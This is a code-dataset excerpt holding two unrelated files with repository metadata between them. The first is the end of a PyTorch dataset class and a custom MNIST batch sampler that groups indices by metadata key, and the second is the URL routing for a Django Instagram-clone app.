tmp = ' Transforms (if any): '
fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
tmp = ' Target Transforms (if any): '
fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
return fmt_str
class MNISTSampler(torch.utils.data.sampler.Sampler):
r"""Base class for all Samplers.
Every Sampler subclass has to provide an __iter__ method, providing a way
to iterate over indices of dataset elements, and a __len__ method that
returns the length of the returned iterators.
"""
def __init__(self, data_source, bs):
self.data_source=data_source
self.meta=self.data_source.U
self.dict_meta={}
self.indeces={}
self.keys=[]
self.bs=bs
for idx, u in enumerate(self.meta):
try:
self.dict_meta[u].append(idx)
except:
self.dict_meta[u]=[idx]
self.keys.append(u)
self.indeces[u]=0
for idx in self.keys:
shuffle(self.dict_meta[idx])
def _sampling(self,idx, n):
if self.indeces[idx]+n>=len(self.dict_meta[idx]):
self.dict_meta[idx]=self.dict_meta[idx]+self.dict_meta[idx]
self.indeces[idx]=self.indeces[idx]+n
return self.dict_meta[idx][self.indeces[idx]-n:self.indeces[idx]]
def _shuffle(self):
order=np.random.randint(len(self.keys),size=(len(self.data_source)//(self.bs)))
sIdx=[]
for i in order:
sIdx=sIdx+self._sampling(self.keys[i],self.bs)
return np.array(sIdx)
def __iter__(self):
return iter(self._shuffle())
def __len__(self):
return len(self.data_source)/self.bs*self.bs
| 2.140625 | 2 |
insta/urls.py | kaphie/InstaClone | 0 | 12761050 | from django.urls import path, include
from django.contrib.auth import views as auth_views
from .views import (
PostlistView,
PostCreateView,
PostDetailView,
PostUpdateView,
PostDeleteView,
saved_posts,
PostLikeToggle,
)
app_name = 'insta'
urlpatterns = [
#local : http://127.0.0.1:8000/
path('', PostlistView.as_view(), name='post_list'),
path('new/', PostCreateView.as_view(), name='post_create'),
path('<int:id>', PostDetailView.as_view(), name='post_detail'),
path('new/', PostCreateView.as_view(), name='post_new'),
path('<int:id>/update/', PostUpdateView.as_view(), name='post_update'),
path('<int:id>/delete/', PostDeleteView.as_view(), name='post_delete'),
path('<int:id>/likes/', PostLikeToggle.as_view(), name='like_toggle'),
path('saved/', saved_posts, name='saved_posts'),
# path('login/', auth_views.login, name='login'),
# path('user_profile/', auth_views.user_profile, name='user_profile'),
]
| 1.945313 | 2 |